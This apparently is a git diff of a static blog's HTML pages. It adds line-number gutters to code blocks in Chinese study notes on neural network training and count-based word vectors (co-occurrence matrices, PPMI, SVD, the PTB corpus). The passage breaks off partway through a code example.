            import numpy as np
            from common.layers import Affine, Sigmoid, SoftmaxWithLoss


            class TwoLayerNet:
            def __init__(self, input_size, hidden_size, output_size):
            I, H, O = input_size, hidden_size, output_size
            # 初始化权重和偏置
            W1 = 0.01 * np.random.randn(I, H)
            b1 = np.zeros(H)
            W2 = 0.01 * np.random.randn(H, O)
            b2 = np.zeros(O)
            # 生成层
            self.layers = [Affine(W1, b1), Sigmoid(), Affine(W2, b2)]
            self.loss_layer = SoftmaxWithLoss()
            # 将所有的权重和梯度整理到列表中
            self.params, self.grads = [], []
            for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads


            def predict(self, x):
            for layer in self.layers:
            x = layer.forward(x)
            return x


            def forward(self, x, t):
            score = self.predict(x)
            loss = self.loss_layer.forward(score, t)
            return loss


            def backward(self, dout=1):
            dout = self.loss_layer.backward(dout)
            for layer in reversed(self.layers):
            dout = layer.backward(dout)
            return dout
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            import sys
            sys.path.append('..')
            import numpy as np
            from common.layers import Affine, Sigmoid, SoftmaxWithLoss


            class TwoLayerNet:
            def __init__(self, input_size, hidden_size, output_size):
            I, H, O = input_size, hidden_size, output_size
            # 初始化权重和偏置
            W1 = 0.01 * np.random.randn(I, H)
            b1 = np.zeros(H)
            W2 = 0.01 * np.random.randn(H, O)
            b2 = np.zeros(O)
            # 生成层
            self.layers = [Affine(W1, b1), Sigmoid(), Affine(W2, b2)]
            self.loss_layer = SoftmaxWithLoss()
            # 将所有的权重和梯度整理到列表中
            self.params, self.grads = [], []
            for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads


            def predict(self, x):
            for layer in self.layers:
            x = layer.forward(x)
            return x


            def forward(self, x, t):
            score = self.predict(x)
            loss = self.loss_layer.forward(score, t)
            return loss


            def backward(self, dout=1):
            dout = self.loss_layer.backward(dout)
            for layer in reversed(self.layers):
            dout = layer.backward(dout)
            return dout

            1.4.3 学习用的代码

            -
            import sys
            sys.path.append('..') # 为了引入父目录的文件而进行的设定
            import numpy as np
            from common.optimizer import SGD
            from dataset import spiral
            import matplotlib.pyplot as plt

            # 设定超参数
            max_epoch = 300
            batch_size = 30
            hidden_size = 10
            learning_rate = 1.0

            x, t = spiral.load_data()
            model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
            optimizer = SGD(lr=learning_rate)

            # 学习用的变量
            data_size = len(x)
            max_iters = data_size // batch_size
            total_loss = 0
            loss_count = 0
            loss_list = []

            for epoch in range(max_epoch):
            """
            在进行学习时,需要随机选择数据作为 mini-batch。
            """
            # 打乱数据 使用 np.random.permutation() 方法。给定参数 N,该方法可以返回 0 到 N − 1 的随机序列。
            idx = np.random.permutation(data_size)
            x = x[idx]
            t = t[idx]

            for iters in range(max_iters):
            batch_x = x[iters*batch_size:(iters+1)*batch_size]
            batch_t = t[iters*batch_size:(iters+1)*batch_size]

            # 计算梯度,更新参数
            loss = model.forward(batch_x, batch_t)
            model.backward()
            optimizer.update(model.params, model.grads)

            total_loss += loss
            loss_count += 1

            # 定期输出学习过程
            if (iters+1) % 10 == 0:
            avg_loss = total_loss / loss_count
            print('| epoch %d | iter %d / %d | loss %.2f'
            % (epoch + 1, iters + 1, max_iters, avg_loss))
            loss_list.append(avg_loss)
            total_loss, loss_count = 0, 0
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            46
            47
            48
            49
            50
            51
            52
            import sys
            sys.path.append('..') # 为了引入父目录的文件而进行的设定
            import numpy as np
            from common.optimizer import SGD
            from dataset import spiral
            import matplotlib.pyplot as plt

            # 设定超参数
            max_epoch = 300
            batch_size = 30
            hidden_size = 10
            learning_rate = 1.0

            x, t = spiral.load_data()
            model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
            optimizer = SGD(lr=learning_rate)

            # 学习用的变量
            data_size = len(x)
            max_iters = data_size // batch_size
            total_loss = 0
            loss_count = 0
            loss_list = []

            for epoch in range(max_epoch):
            """
            在进行学习时,需要随机选择数据作为 mini-batch。
            """
            # 打乱数据 使用 np.random.permutation() 方法。给定参数 N,该方法可以返回 0 到 N − 1 的随机序列。
            idx = np.random.permutation(data_size)
            x = x[idx]
            t = t[idx]

            for iters in range(max_iters):
            batch_x = x[iters*batch_size:(iters+1)*batch_size]
            batch_t = t[iters*batch_size:(iters+1)*batch_size]

            # 计算梯度,更新参数
            loss = model.forward(batch_x, batch_t)
            model.backward()
            optimizer.update(model.params, model.grads)

            total_loss += loss
            loss_count += 1

            # 定期输出学习过程
            if (iters+1) % 10 == 0:
            avg_loss = total_loss / loss_count
            print('| epoch %d | iter %d / %d | loss %.2f'
            % (epoch + 1, iters + 1, max_iters, avg_loss))
            loss_list.append(avg_loss)
            total_loss, loss_count = 0, 0
            | epoch 1 |  iter 10 / 10 | loss 1.13
             | epoch 2 |  iter 10 / 10 | loss 1.13
             | epoch 3 |  iter 10 / 10 | loss 1.12
            @@ -715,15 +713,15 @@ 

            # 绘制学习结果
            plt.plot(np.arange(len(loss_list)), loss_list, label='train')
            plt.xlabel('iterations (x10)')
            plt.ylabel('loss')
            plt.show()
            +
            1
            2
            3
            4
            5
            # 绘制学习结果
            plt.plot(np.arange(len(loss_list)), loss_list, label='train')
            plt.xlabel('iterations (x10)')
            plt.ylabel('loss')
            plt.show()


            png

            -
            # 绘制决策边界
            h = 0.001
            x_min, x_max = x[:, 0].min() - .1, x[:, 0].max() + .1
            y_min, y_max = x[:, 1].min() - .1, x[:, 1].max() + .1
            xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
            X = np.c_[xx.ravel(), yy.ravel()]
            score = model.predict(X)
            predict_cls = np.argmax(score, axis=1)
            Z = predict_cls.reshape(xx.shape)
            plt.contourf(xx, yy, Z)
            plt.axis('off')

            # 绘制数据点
            x, t = spiral.load_data()
            N = 100
            CLS_NUM = 3
            markers = ['o', 'x', '^']
            for i in range(CLS_NUM):
            plt.scatter(x[i*N:(i+1)*N, 0], x[i*N:(i+1)*N, 1], s=40, marker=markers[i])
            plt.show()
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            # 绘制决策边界
            h = 0.001
            x_min, x_max = x[:, 0].min() - .1, x[:, 0].max() + .1
            y_min, y_max = x[:, 1].min() - .1, x[:, 1].max() + .1
            xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
            X = np.c_[xx.ravel(), yy.ravel()]
            score = model.predict(X)
            predict_cls = np.argmax(score, axis=1)
            Z = predict_cls.reshape(xx.shape)
            plt.contourf(xx, yy, Z)
            plt.axis('off')

            # 绘制数据点
            x, t = spiral.load_data()
            N = 100
            CLS_NUM = 3
            markers = ['o', 'x', '^']
            for i in range(CLS_NUM):
            plt.scatter(x[i*N:(i+1)*N, 0], x[i*N:(i+1)*N, 1], s=40, marker=markers[i])
            plt.show()

            png

            1.4.4 Trainer 类

            将执行神经网络的学习封装成一个类。

            -
            import sys
            sys.path.append('..')
            from common.optimizer import SGD
            from common.trainer import Trainer
            from dataset import spiral

            max_epoch = 300
            batch_size = 30
            hidden_size = 10
            learning_rate = 1.0
            x, t = spiral.load_data()
            model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
            optimizer = SGD(lr=learning_rate)
            trainer = Trainer(model, optimizer)
            """
            x: 输入数据
            t: 监督标签
            max_epoch (= 10): 进行学习的 epoch 数
            batch_size(= 32): mini-batch 的大小
            eval_interval(= 20): 输出结果(平均损失等)的间隔。
            例如设置 eval_interval=20,则每 20 次迭代计算 1 次平均损失,并将结果输出到界面上。
            max_grad(= None): 梯度的最大范数。
            """
            trainer.fit(x, t, max_epoch, batch_size, eval_interval=10)
            trainer.plot()
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            import sys
            sys.path.append('..')
            from common.optimizer import SGD
            from common.trainer import Trainer
            from dataset import spiral

            max_epoch = 300
            batch_size = 30
            hidden_size = 10
            learning_rate = 1.0
            x, t = spiral.load_data()
            model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
            optimizer = SGD(lr=learning_rate)
            trainer = Trainer(model, optimizer)
            """
            x: 输入数据
            t: 监督标签
            max_epoch (= 10): 进行学习的 epoch 数
            batch_size(= 32): mini-batch 的大小
            eval_interval(= 20): 输出结果(平均损失等)的间隔。
            例如设置 eval_interval=20,则每 20 次迭代计算 1 次平均损失,并将结果输出到界面上。
            max_grad(= None): 梯度的最大范数。
            """
            trainer.fit(x, t, max_epoch, batch_size, eval_interval=10)
            trainer.plot()
            | epoch 1 |  iter 1 / 10 | time 0[s] | loss 1.10
             | epoch 2 |  iter 1 / 10 | time 0[s] | loss 1.12
             | epoch 3 |  iter 1 / 10 | time 0[s] | loss 1.13
            @@ -4971,6 +4969,8 @@ 

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-2-\350\207\252\347\204\266\350\257\255\350\250\200\345\222\214\345\215\225\350\257\215\347\232\204\345\210\206\345\270\203\345\274\217\350\241\250\347\244\272/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-2-\350\207\252\347\204\266\350\257\255\350\250\200\345\222\214\345\215\225\350\257\215\347\232\204\345\210\206\345\270\203\345\274\217\350\241\250\347\244\272/index.html" index 0c95f3b17b..a257bd2b8c 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-2-\350\207\252\347\204\266\350\257\255\350\250\200\345\222\214\345\215\225\350\257\215\347\232\204\345\210\206\345\270\203\345\274\217\350\241\250\347\244\272/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-2-\350\207\252\347\204\266\350\257\255\350\250\200\345\222\214\345\215\225\350\257\215\347\232\204\345\210\206\345\270\203\345\274\217\350\241\250\347\244\272/index.html" @@ -44,8 +44,6 @@ - - @@ -436,35 +434,35 @@

            语料库中包含了大量的关于自然语言的实践知识,即文章的写作方法、单词的选择方法和单词含义等。基于计数的方法的目标就是从这些富有实践知识的语料库中,自动且高效地提取本质。

            2.3.1 基于 Python 的语料库的预处理

            将文本分割为单词(分词),并将分割后的单词列表转化为单词 ID 列表。

            -
            text = 'You say goodbye and I say hello.'
            text = text.lower()
            text = text.replace('.', ' .')
            text
            +
            1
            2
            3
            4
            text = 'You say goodbye and I say hello.'
            text = text.lower()
            text = text.replace('.', ' .')
            text
            'you say goodbye and i say hello .'
             
            -
            words = text.split(' ')
            words
            +
            1
            2
            words = text.split(' ')
            words
            ['you', 'say', 'goodbye', 'and', 'i', 'say', 'hello', '.']
             

            给单词标上 ID,以便使用单词 ID 列表:

            -
            word_to_id = {}
            id_to_word = {}

            for word in words:
            if word not in word_to_id:
            new_id = len(word_to_id)
            word_to_id[word] = new_id
            id_to_word[new_id] = word
            -
            id_to_word
            +
            1
            2
            3
            4
            5
            6
            7
            8
            word_to_id = {}
            id_to_word = {}

            for word in words:
            if word not in word_to_id:
            new_id = len(word_to_id)
            word_to_id[word] = new_id
            id_to_word[new_id] = word
            +
            1
            id_to_word
            {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
             
            -
            word_to_id
            +
            1
            word_to_id
            {'you': 0, 'say': 1, 'goodbye': 2, 'and': 3, 'i': 4, 'hello': 5, '.': 6}
             

            根据单词 ID 检索单词:

            -
            id_to_word[1]
            +
            1
            id_to_word[1]
            'say'
             

            根据单词检索单词 ID:

            -
            word_to_id['hello']
            +
            1
            word_to_id['hello']
            5
             

            将单词列表转化为单词 ID 列表:

            -
            import numpy as np

            corpus = [word_to_id[w] for w in words]
            corpus = np.array(corpus)
            corpus
            +
            1
            2
            3
            4
            5
            import numpy as np

            corpus = [word_to_id[w] for w in words]
            corpus = np.array(corpus)
            corpus
            array([0, 1, 2, 3, 4, 1, 5, 6])
             
            -
            def preprocess(text):
            text = text.lower()
            text = text.replace('.', ' .')
            words = text.split(' ')
            word_to_id = {}
            id_to_word = {}
            for word in words:
            if word not in word_to_id:
            new_id = len(word_to_id)
            word_to_id[word] = new_id
            id_to_word[new_id] = word
            corpus = np.array([word_to_id[w] for w in words])
            return corpus, word_to_id, id_to_word
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            def preprocess(text):
            text = text.lower()
            text = text.replace('.', ' .')
            words = text.split(' ')
            word_to_id = {}
            id_to_word = {}
            for word in words:
            if word not in word_to_id:
            new_id = len(word_to_id)
            word_to_id[word] = new_id
            id_to_word[new_id] = word
            corpus = np.array([word_to_id[w] for w in words])
            return corpus, word_to_id, id_to_word

            使用这个函数,可以按如下方式对语料库进行预处理:

            -
            text = 'You say goodbye and I say hello.'
            """
            corpus 是单词 ID 列表,word_to_id 是单词到单词 ID 的字典,id_to_word 是单词 ID 到单词的字典。
            """
            corpus, word_to_id, id_to_word = preprocess(text)
            +
            1
            2
            3
            4
            5
            text = 'You say goodbye and I say hello.'
            """
            corpus 是单词 ID 列表,word_to_id 是单词到单词 ID 的字典,id_to_word 是单词 ID 到单词的字典。
            """
            corpus, word_to_id, id_to_word = preprocess(text)

            2.3.2 单词的分布式表示

            在单词领域构建紧凑合理的向量表示。在自然语言处理领域,这称为分布式表示

            2.3.3 分布式假设

            @@ -472,41 +470,41 @@

            2.3.4 共现矩阵

            在关注某个单词的情况下,对它的周围出现了多少次什么单词进行计数,然后再汇总。这里,我们将这种做法称为“基于计数的方法”,在有的文献中也称为“基于统计的方法”。

            -
            import sys
            sys.path.append('..')
            import numpy as np
            from common.util import preprocess

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            -
            corpus
            +
            1
            2
            3
            4
            5
            6
            7
            import sys
            sys.path.append('..')
            import numpy as np
            from common.util import preprocess

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            +
            1
            corpus
            array([0, 1, 2, 3, 4, 1, 5, 6])
             
            -
            id_to_word
            +
            1
            id_to_word
            {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
             

            png

            -
            C = np.array([
            [0, 1, 0, 0, 0, 0, 0],
            [1, 0, 1, 0, 1, 1, 0],
            [0, 1, 0, 1, 0, 0, 0],
            [0, 0, 1, 0, 1, 0, 0],
            [0, 1, 0, 1, 0, 0, 0],
            [0, 1, 0, 0, 0, 0, 1],
            [0, 0, 0, 0, 0, 1, 0],
            ], dtype=np.int32)
            -
            print(C[0])  # 单词 ID 为 0 的向量
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            C = np.array([
            [0, 1, 0, 0, 0, 0, 0],
            [1, 0, 1, 0, 1, 1, 0],
            [0, 1, 0, 1, 0, 0, 0],
            [0, 0, 1, 0, 1, 0, 0],
            [0, 1, 0, 1, 0, 0, 0],
            [0, 1, 0, 0, 0, 0, 1],
            [0, 0, 0, 0, 0, 1, 0],
            ], dtype=np.int32)
            +
            1
            print(C[0])  # 单词 ID 为 0 的向量
            [0 1 0 0 0 0 0]
             
            -
            print(C[4])  # 单词 ID 为 4 的向量
            +
            1
            print(C[4])  # 单词 ID 为 4 的向量
            [0 1 0 1 0 0 0]
             
            -
            print(C[word_to_id['goodbye']]) # goodbye 的向量
            +
            1
            print(C[word_to_id['goodbye']]) # goodbye 的向量
            [0 1 0 1 0 0 0]
             

            实现一个能直接从语料库生成共现矩阵的函数:

            -
            def create_co_matrix(corpus, vocab_size, window_size=1):
            """
            直接从语料库生成共现矩阵
            corpus: 单词 ID 列表
            vocab_size: 词汇个数
            window_size: 窗口大小
            """
            corpus_size = len(corpus)
            co_matrix = np.zeros((vocab_size, vocab_size), dtype=np.int32)
            for idx, word_id in enumerate(corpus):
            for i in range(1, window_size + 1):
            left_idx = idx - i
            right_idx = idx + i

            if left_idx >= 0:
            left_word_id = corpus[left_idx]
            co_matrix[word_id, left_word_id] += 1

            if right_idx < corpus_size:
            right_word_id = corpus[right_idx]
            co_matrix[word_id, right_word_id] += 1
            return co_matrix
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            def create_co_matrix(corpus, vocab_size, window_size=1):
            """
            直接从语料库生成共现矩阵
            corpus: 单词 ID 列表
            vocab_size: 词汇个数
            window_size: 窗口大小
            """
            corpus_size = len(corpus)
            co_matrix = np.zeros((vocab_size, vocab_size), dtype=np.int32)
            for idx, word_id in enumerate(corpus):
            for i in range(1, window_size + 1):
            left_idx = idx - i
            right_idx = idx + i

            if left_idx >= 0:
            left_word_id = corpus[left_idx]
            co_matrix[word_id, left_word_id] += 1

            if right_idx < corpus_size:
            right_word_id = corpus[right_idx]
            co_matrix[word_id, right_word_id] += 1
            return co_matrix

            2.3.5 向量间的相似度

            余弦相似度(cosine similarity)。设有 $x=(x_1,x_2,x_3,…,x_n)$ 和 $y=(y_1,y_2,y_3,…,y_n)$ 两个向量,它们之间的余弦相似度定义如下:

            $$\mathrm{similarity}(x,y)=\frac{x\cdot y}{||x||\ ||y||}\frac{x_1y_1+…+x_ny_n}{\sqrt{x2_1+…+x2_n}\sqrt{y2_1+…+y2_n}}$$

            -
            def cos_similarity(x, y):
            nx = x / np.sqrt(np.sum(x ** 2)) # x 的正规化
            ny = y / np.sqrt(np.sum(y ** 2)) # y 的正规化
            return np.dot(nx, ny)
            +
            1
            2
            3
            4
            def cos_similarity(x, y):
            nx = x / np.sqrt(np.sum(x ** 2)) # x 的正规化
            ny = y / np.sqrt(np.sum(y ** 2)) # y 的正规化
            return np.dot(nx, ny)

            这里当零向量(元素全部为 0 的向量)被赋值给参数时,会出现“除数为 0”(zero division)的错误。

            通过参数指定一个微小值 eps(eps 是 epsilon 的缩写),并默认 eps=1e-8(= 0.000 000 01)以防止“除数为 0”的错误。

            -
            def cos_similarity(x, y, eps=1e-8):
            nx = x / (np.sqrt(np.sum(x ** 2)) + eps)
            ny = y / (np.sqrt(np.sum(y ** 2)) + eps)
            return np.dot(nx, ny)
            +
            1
            2
            3
            4
            def cos_similarity(x, y, eps=1e-8):
            nx = x / (np.sqrt(np.sum(x ** 2)) + eps)
            ny = y / (np.sqrt(np.sum(y ** 2)) + eps)
            return np.dot(nx, ny)

            youi(= I)的相似度:

            -
            import sys
            sys.path.append('..')
            from common.util import preprocess, create_co_matrix, cos_similarity

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(word_to_id)
            C = create_co_matrix(corpus, vocab_size)
            c0 = C[word_to_id['you']] # you 的单词向量
            c1 = C[word_to_id['i']] # i 的单词向量
            print(cos_similarity(c0, c1))
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            import sys
            sys.path.append('..')
            from common.util import preprocess, create_co_matrix, cos_similarity

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(word_to_id)
            C = create_co_matrix(corpus, vocab_size)
            c0 = C[word_to_id['you']] # you 的单词向量
            c1 = C[word_to_id['i']] # i 的单词向量
            print(cos_similarity(c0, c1))
            0.7071067691154799
             

            2.3.6 相似单词的排序

            -
            def most_similar(query, word_to_id, id_to_word, word_matrix, top=5):
            """
            当某个单词被作为查询词时,将与这个查询词相似的单词按降序显示出来。
            """
            # 1. 取出查询词
            if query not in word_to_id:
            print('%s is not found' % query)
            return
            print('\n[query] ' + query)
            query_id = word_to_id[query]
            query_vec = word_matrix[query_id]

            # 2. 计算余弦相似度
            vocab_size = len(id_to_word)
            similarity = np.zeros(vocab_size)
            for i in range(vocab_size):
            similarity[i] = cos_similarity(word_matrix[i], query_vec)

            # 3. 基于余弦相似度,按降序输出值
            count = 0
            # argsort() 方法可以按升序对 NumPy 数组的元素进行排序(不过,返回值是数组的索引)
            for i in (-1 * similarity).argsort():
            if id_to_word[i] == query:
            continue
            print(' %s: %s' % (id_to_word[i], similarity[i]))

            count += 1
            if count >= top:
            return
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            def most_similar(query, word_to_id, id_to_word, word_matrix, top=5):
            """
            当某个单词被作为查询词时,将与这个查询词相似的单词按降序显示出来。
            """
            # 1. 取出查询词
            if query not in word_to_id:
            print('%s is not found' % query)
            return
            print('\n[query] ' + query)
            query_id = word_to_id[query]
            query_vec = word_matrix[query_id]

            # 2. 计算余弦相似度
            vocab_size = len(id_to_word)
            similarity = np.zeros(vocab_size)
            for i in range(vocab_size):
            similarity[i] = cos_similarity(word_matrix[i], query_vec)

            # 3. 基于余弦相似度,按降序输出值
            count = 0
            # argsort() 方法可以按升序对 NumPy 数组的元素进行排序(不过,返回值是数组的索引)
            for i in (-1 * similarity).argsort():
            if id_to_word[i] == query:
            continue
            print(' %s: %s' % (id_to_word[i], similarity[i]))

            count += 1
            if count >= top:
            return

            试着使用一下。这里将 you 作为查询词,显示与其相似的单词。

            -
            import sys
            sys.path.append('..')
            from common.util import preprocess, create_co_matrix, most_similar

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(word_to_id)
            C = create_co_matrix(corpus, vocab_size)

            most_similar('you', word_to_id, id_to_word, C, top=5)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            import sys
            sys.path.append('..')
            from common.util import preprocess, create_co_matrix, most_similar

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(word_to_id)
            C = create_co_matrix(corpus, vocab_size)

            most_similar('you', word_to_id, id_to_word, C, top=5)
            [query] you
              goodbye: 0.7071067691154799
              i: 0.7071067691154799
            @@ -527,9 +525,9 @@ 

            def ppmi(C, verbose=False, eps=1e-8):
            """
            erbose: 决定是否输出运行情况的标志。
            当处理大语料库时,设置 verbose=True,可以用于确认运行情况
            为了防止 np.log2(0)=-inf 而使用了微小值 eps
            """
            M = np.zeros_like(C, dtype=np.float32)
            N = np.sum(C)
            S = np.sum(C, axis=0)
            total = C.shape[0] * C.shape[1]
            cnt = 0
            for i in range(C.shape[0]):
            for j in range(C.shape[1]):
            pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
            M[i, j] = max(0, pmi)
            if verbose:
            cnt += 1
            if cnt % (total//100+1) == 0:
            print('%.1f%% done' % (100*cnt/total))
            return M
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            def ppmi(C, verbose=False, eps=1e-8):
            """
            erbose: 决定是否输出运行情况的标志。
            当处理大语料库时,设置 verbose=True,可以用于确认运行情况
            为了防止 np.log2(0)=-inf 而使用了微小值 eps
            """
            M = np.zeros_like(C, dtype=np.float32)
            N = np.sum(C)
            S = np.sum(C, axis=0)
            total = C.shape[0] * C.shape[1]
            cnt = 0
            for i in range(C.shape[0]):
            for j in range(C.shape[1]):
            pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
            M[i, j] = max(0, pmi)
            if verbose:
            cnt += 1
            if cnt % (total//100+1) == 0:
            print('%.1f%% done' % (100*cnt/total))
            return M

            将共现矩阵转化为 PPMI 矩阵:

            -
            import sys
            sys.path.append('..')
            import numpy as np
            from common.util import preprocess, create_co_matrix, cos_similarity, ppmi

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(word_to_id)
            C = create_co_matrix(corpus, vocab_size)
            W = ppmi(C)
            np.set_printoptions(precision=3) # 有效位数为 3 位

            print('covariance matrix')
            print(C)
            print('-'*50)
            print('PPMI')
            print(W)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            import sys
            sys.path.append('..')
            import numpy as np
            from common.util import preprocess, create_co_matrix, cos_similarity, ppmi

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(word_to_id)
            C = create_co_matrix(corpus, vocab_size)
            W = ppmi(C)
            np.set_printoptions(precision=3) # 有效位数为 3 位

            print('covariance matrix')
            print(C)
            print('-'*50)
            print('PPMI')
            print(W)
            covariance matrix
             [[0 1 0 0 0 0 0]
              [1 0 1 0 1 1 0]
            @@ -556,19 +554,19 @@ 

            2.4.2 降维$$X=USV^T$$

            SVD 将任意的矩阵 $X$ 分解为 $U、S、V$ 这 3 个矩阵的乘积,其中 $U$ 和 $V$ 是列向量彼此正交的正交矩阵,$S$ 是除了对角线元素以外其余元素均为 0 的对角矩阵。

            2.4.3 基于 SVD 的降维

            -
            import sys
            sys.path.append('..')
            import numpy as np
            import matplotlib.pyplot as plt
            from common.util import preprocess, create_co_matrix, ppmi

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(id_to_word)
            C = create_co_matrix(corpus, vocab_size, window_size=1)
            W = ppmi(C)

            # SVD
            U, S, V = np.linalg.svd(W)
            -
            print(C[0])  # 共现矩阵
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            import sys
            sys.path.append('..')
            import numpy as np
            import matplotlib.pyplot as plt
            from common.util import preprocess, create_co_matrix, ppmi

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(id_to_word)
            C = create_co_matrix(corpus, vocab_size, window_size=1)
            W = ppmi(C)

            # SVD
            U, S, V = np.linalg.svd(W)
            +
            1
            print(C[0])  # 共现矩阵
            [0 1 0 0 0 0 0]
             
            -
            print(W[0]) # PPMI 矩阵
            +
            1
            print(W[0]) # PPMI 矩阵
            [0.    1.807 0.    0.    0.    0.    0.   ]
             
            -
            print(U[0]) # SVD
            +
            1
            print(U[0]) # SVD
            [-3.409e-01 -1.110e-16 -3.886e-16 -1.205e-01  0.000e+00  9.323e-01
               2.226e-16]
             

            原先的稀疏向量 $W[0]$ 经过 SVD 被转化成了密集向量 $U[0]$

            -
            for word, word_id in word_to_id.items():
            plt.annotate(word, (U[word_id, 0], U[word_id, 1]))
            plt.scatter(U[:,0], U[:,1], alpha=0.5)
            plt.show()
            +
            1
            2
            3
            4
            for word, word_id in word_to_id.items():
            plt.annotate(word, (U[word_id, 0], U[word_id, 1]))
            plt.scatter(U[:,0], U[:,1], alpha=0.5)
            plt.show()


            png

            @@ -579,7 +577,7 @@

            2.4.4 PTB 数据集

            我们使用的 PTB 语料库在 word2vec 的发明者托马斯· 米科洛夫(Tomas Mikolov)的网页上有提供。这个 PTB 语料库是以文本文件的形式提供的,与原始的 PTB 的文章相比,多了若干预处理,包括将稀有单词替换成特殊字符(unk 是 unknown 的简称),将具体的数字替换成“N”等。

            PTB 下载地址:http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz

            -
            import sys
            sys.path.append('..')
            from dataset import ptb

            corpus, word_to_id, id_to_word = ptb.load_data('train')
            print('corpus size:', len(corpus))
            print('corpus[:30]:', corpus[:30])
            print()
            print('id_to_word[0]:', id_to_word[0])
            print('id_to_word[1]:', id_to_word[1])
            print('id_to_word[2]:', id_to_word[2])
            print()
            print("word_to_id['car']:", word_to_id['car'])
            print("word_to_id['happy']:", word_to_id['happy'])
            print("word_to_id['lexus']:", word_to_id['lexus'])
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            import sys
            sys.path.append('..')
            from dataset import ptb

            corpus, word_to_id, id_to_word = ptb.load_data('train')
            print('corpus size:', len(corpus))
            print('corpus[:30]:', corpus[:30])
            print()
            print('id_to_word[0]:', id_to_word[0])
            print('id_to_word[1]:', id_to_word[1])
            print('id_to_word[2]:', id_to_word[2])
            print()
            print("word_to_id['car']:", word_to_id['car'])
            print("word_to_id['happy']:", word_to_id['happy'])
            print("word_to_id['lexus']:", word_to_id['lexus'])
            corpus size: 929589
             corpus[:30]: [ 0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
              24 25 26 27 28 29]
            @@ -594,7 +592,7 @@ 

            2.4.5 基于 PTB 数据集的评价

            这里建议使用更快速的 SVD 对大矩阵执行 SVD,为此我们需要安装 sklearn 模块。当然,虽然仍可以使用基本版的 SVD(np.linalg.svd()),但是这需要更多的时间和内存。

            -
            import sys
            sys.path.append('..')
            import numpy as np
            from common.util import most_similar, create_co_matrix, ppmi
            from dataset import ptb

            window_size = 2
            wordvec_size = 100
            corpus, word_to_id, id_to_word = ptb.load_data('train')
            vocab_size = len(word_to_id)
            print('counting co-occurrence ...')
            C = create_co_matrix(corpus, vocab_size, window_size)
            print('calculating PPMI ...')
            W = ppmi(C, verbose=True)

            print('calculating SVD ...')
            try:
